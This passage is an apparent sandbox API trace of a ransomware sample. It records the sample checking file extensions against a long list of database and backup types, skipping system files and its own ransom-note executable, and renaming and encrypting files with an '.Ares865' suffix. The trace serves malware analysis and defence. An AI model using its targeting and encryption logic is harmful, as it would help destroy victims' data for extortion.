returned 8 [0088.390] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.390] lstrlenW (lpString="xml") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.390] lstrlenW (lpString="$er") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.390] lstrlenW (lpString="4dd") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.390] lstrlenW (lpString="4dl") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.390] lstrlenW (lpString="^^^") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.390] lstrlenW (lpString="abs") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.390] lstrlenW (lpString="abx") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.390] lstrlenW (lpString="accdb") returned 5 [0088.390] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.390] lstrlenW (lpString="accdc") returned 5 [0088.390] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.390] lstrlenW (lpString="accde") returned 5 [0088.390] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.390] lstrlenW (lpString="accdr") returned 5 [0088.391] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.391] lstrlenW (lpString="accdt") returned 5 [0088.391] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.391] lstrlenW (lpString="accdw") returned 5 [0088.391] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.391] lstrlenW (lpString="accft") returned 5 [0088.391] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.391] lstrlenW (lpString="adb") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.391] lstrlenW (lpString="adb") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.391] lstrlenW (lpString="ade") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.391] lstrlenW (lpString="adf") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.391] lstrlenW (lpString="adn") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.391] lstrlenW (lpString="adp") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.391] lstrlenW (lpString="alf") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.391] lstrlenW (lpString="ask") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.391] lstrlenW (lpString="btr") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.391] lstrlenW (lpString="cat") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.391] lstrlenW (lpString="cdb") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.391] lstrlenW (lpString="ckp") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.391] lstrlenW (lpString="cma") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.391] lstrlenW (lpString="cpd") returned 3 [0088.391] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.391] lstrlenW (lpString="dacpac") returned 6 [0088.391] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.391] lstrlenW (lpString="dad") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.392] lstrlenW (lpString="dadiagrams") returned 10 [0088.392] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.392] lstrlenW (lpString="daschema") returned 8 [0088.392] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.392] lstrlenW (lpString="db-journal") returned 10 [0088.392] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.392] lstrlenW (lpString="db-shm") returned 6 [0088.392] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.392] lstrlenW (lpString="db-wal") returned 6 [0088.392] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.392] lstrlenW (lpString="dbc") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.392] lstrlenW (lpString="dbs") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.392] lstrlenW (lpString="dbt") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.392] lstrlenW (lpString="dbv") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.392] lstrlenW (lpString="dbx") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.392] lstrlenW (lpString="dcb") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.392] lstrlenW (lpString="dct") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.392] lstrlenW (lpString="dcx") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.392] lstrlenW (lpString="ddl") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.392] lstrlenW (lpString="dlis") returned 4 [0088.392] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.392] lstrlenW (lpString="dp1") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.392] lstrlenW (lpString="dqy") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.392] lstrlenW (lpString="dsk") returned 3 [0088.392] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.392] lstrlenW (lpString="dsn") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.393] lstrlenW (lpString="dtsx") returned 4 [0088.393] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.393] lstrlenW (lpString="dxl") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.393] lstrlenW (lpString="eco") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.393] lstrlenW (lpString="ecx") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.393] lstrlenW (lpString="edb") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.393] lstrlenW (lpString="epim") returned 4 [0088.393] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.393] lstrlenW (lpString="fcd") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.393] lstrlenW (lpString="fdb") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.393] lstrlenW (lpString="fic") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.393] lstrlenW (lpString="flexolibrary") returned 12 [0088.393] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.393] lstrlenW (lpString="fm5") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.393] lstrlenW (lpString="fmp") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.393] lstrlenW (lpString="fmp12") returned 5 [0088.393] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.393] lstrlenW (lpString="fmpsl") returned 5 [0088.393] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.393] lstrlenW (lpString="fol") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.393] lstrlenW (lpString="fp3") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.393] lstrlenW (lpString="fp4") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.393] lstrlenW (lpString="fp5") returned 3 [0088.393] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.394] lstrlenW (lpString="fp7") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.394] lstrlenW (lpString="fpt") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.394] lstrlenW (lpString="frm") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.394] lstrlenW (lpString="gdb") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.394] lstrlenW (lpString="gdb") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.394] lstrlenW (lpString="grdb") returned 4 [0088.394] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.394] lstrlenW (lpString="gwi") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.394] lstrlenW (lpString="hdb") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.394] lstrlenW (lpString="his") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.394] lstrlenW (lpString="ib") returned 2 [0088.394] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.394] lstrlenW (lpString="idb") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.394] lstrlenW (lpString="ihx") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.394] lstrlenW (lpString="itdb") returned 4 [0088.394] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.394] lstrlenW (lpString="itw") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.394] lstrlenW (lpString="jet") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.394] lstrlenW (lpString="jtx") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.394] lstrlenW (lpString="kdb") returned 3 [0088.394] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.394] lstrlenW (lpString="kexi") returned 4 [0088.394] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.394] lstrlenW (lpString="kexic") returned 5 [0088.394] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.395] lstrlenW (lpString="kexis") returned 5 [0088.395] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.395] lstrlenW (lpString="lgc") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.395] lstrlenW (lpString="lwx") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.395] lstrlenW (lpString="maf") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.395] lstrlenW (lpString="maq") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.395] lstrlenW (lpString="mar") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.395] lstrlenW (lpString="marshal") returned 7 [0088.395] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.395] lstrlenW (lpString="mas") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.395] lstrlenW (lpString="mav") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.395] lstrlenW (lpString="maw") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.395] lstrlenW (lpString="mdbhtml") returned 7 [0088.395] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.395] lstrlenW (lpString="mdn") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.395] lstrlenW (lpString="mdt") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.395] lstrlenW (lpString="mfd") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.395] lstrlenW (lpString="mpd") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.395] lstrlenW (lpString="mrg") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.395] lstrlenW (lpString="mud") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.395] lstrlenW (lpString="mwb") returned 3 [0088.395] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.395] lstrlenW (lpString="myd") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.396] lstrlenW (lpString="ndf") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.396] lstrlenW (lpString="nnt") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.396] lstrlenW (lpString="nrmlib") returned 6 [0088.396] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.396] lstrlenW (lpString="ns2") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.396] lstrlenW (lpString="ns3") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.396] lstrlenW (lpString="ns4") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.396] lstrlenW (lpString="nsf") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.396] lstrlenW (lpString="nv") returned 2 [0088.396] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.396] lstrlenW (lpString="nv2") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.396] lstrlenW (lpString="nwdb") returned 4 [0088.396] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.396] lstrlenW (lpString="nyf") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.396] lstrlenW (lpString="odb") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.396] lstrlenW (lpString="odb") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.396] lstrlenW (lpString="oqy") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.396] lstrlenW (lpString="ora") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.396] lstrlenW (lpString="orx") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.396] lstrlenW (lpString="owc") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.396] lstrlenW (lpString="p96") returned 3 [0088.396] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.396] lstrlenW (lpString="p97") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.397] lstrlenW (lpString="pan") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.397] lstrlenW (lpString="pdb") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.397] lstrlenW (lpString="pdm") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.397] lstrlenW (lpString="pnz") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.397] lstrlenW (lpString="qry") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.397] lstrlenW (lpString="qvd") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.397] lstrlenW (lpString="rbf") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.397] lstrlenW (lpString="rctd") returned 4 [0088.397] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.397] lstrlenW (lpString="rod") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.397] lstrlenW (lpString="rodx") returned 4 [0088.397] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.397] lstrlenW (lpString="rpd") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.397] lstrlenW (lpString="rsd") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.397] lstrlenW (lpString="sas7bdat") returned 8 [0088.397] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.397] lstrlenW (lpString="sbf") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.397] lstrlenW (lpString="scx") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.397] lstrlenW (lpString="sdb") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.397] lstrlenW (lpString="sdc") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.397] lstrlenW (lpString="sdf") returned 3 [0088.397] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.397] lstrlenW (lpString="sis") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.398] lstrlenW (lpString="spq") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.398] lstrlenW (lpString="te") returned 2 [0088.398] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.398] lstrlenW (lpString="teacher") returned 7 [0088.398] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.398] lstrlenW (lpString="tmd") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.398] lstrlenW (lpString="tps") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.398] lstrlenW (lpString="trc") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.398] lstrlenW (lpString="trc") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.398] lstrlenW (lpString="trm") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.398] lstrlenW (lpString="udb") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.398] lstrlenW (lpString="udl") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.398] lstrlenW (lpString="usr") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.398] lstrlenW (lpString="v12") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.398] lstrlenW (lpString="vis") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.398] lstrlenW (lpString="vpd") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.398] lstrlenW (lpString="vvv") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.398] lstrlenW (lpString="wdb") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.398] lstrlenW (lpString="wmdb") returned 4 [0088.398] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.398] lstrlenW (lpString="wrk") returned 3 [0088.398] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.399] lstrlenW (lpString="xdb") returned 3 [0088.399] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.399] lstrlenW (lpString="xld") returned 3 [0088.399] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.399] lstrlenW (lpString="xmlff") returned 5 [0088.399] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.399] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.Ares865") returned 78 [0088.399] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.400] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.400] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16736) returned 1 [0088.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.400] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.401] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.401] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4460, lpName=0x0) returned 0x15c [0088.402] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4460) returned 0x190000 [0088.404] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.405] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.405] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.405] CloseHandle (hObject=0x15c) returned 1 [0088.405] CloseHandle (hObject=0x118) returned 1 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.406] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="..") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="windows") returned -1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="temp") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="boot") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.406] lstrlenW (lpString="VISBRRES.DLL.trx_dll") returned 20 [0088.406] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0088.406] lstrcpyW (in: lpString1=0x2cce468, lpString2="VISBRRES.DLL.trx_dll" | out: lpString1="VISBRRES.DLL.trx_dll") returned="VISBRRES.DLL.trx_dll" [0088.406] lstrlenW (lpString="VISBRRES.DLL.trx_dll") returned 20 [0088.406] lstrlenW (lpString="Ares865") returned 7 [0088.406] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.406] lstrlenW (lpString=".dll") returned 4 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".dll") returned 1 [0088.406] lstrlenW (lpString=".lnk") returned 4 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.406] lstrlenW (lpString=".ini") returned 4 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".ini") returned 1 [0088.406] lstrlenW (lpString=".sys") returned 4 [0088.406] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".sys") returned 1 [0088.406] lstrlenW (lpString="VISBRRES.DLL.trx_dll") returned 20 [0088.406] lstrlenW (lpString="bak") returned 3 [0088.406] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.406] lstrlenW (lpString="ba_") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.407] lstrlenW (lpString="dbb") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.407] lstrlenW (lpString="vmdk") returned 4 [0088.407] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.407] lstrlenW (lpString="rar") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.407] lstrlenW (lpString="zip") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.407] lstrlenW (lpString="tgz") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.407] lstrlenW (lpString="vbox") returned 4 [0088.407] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.407] lstrlenW (lpString="vdi") 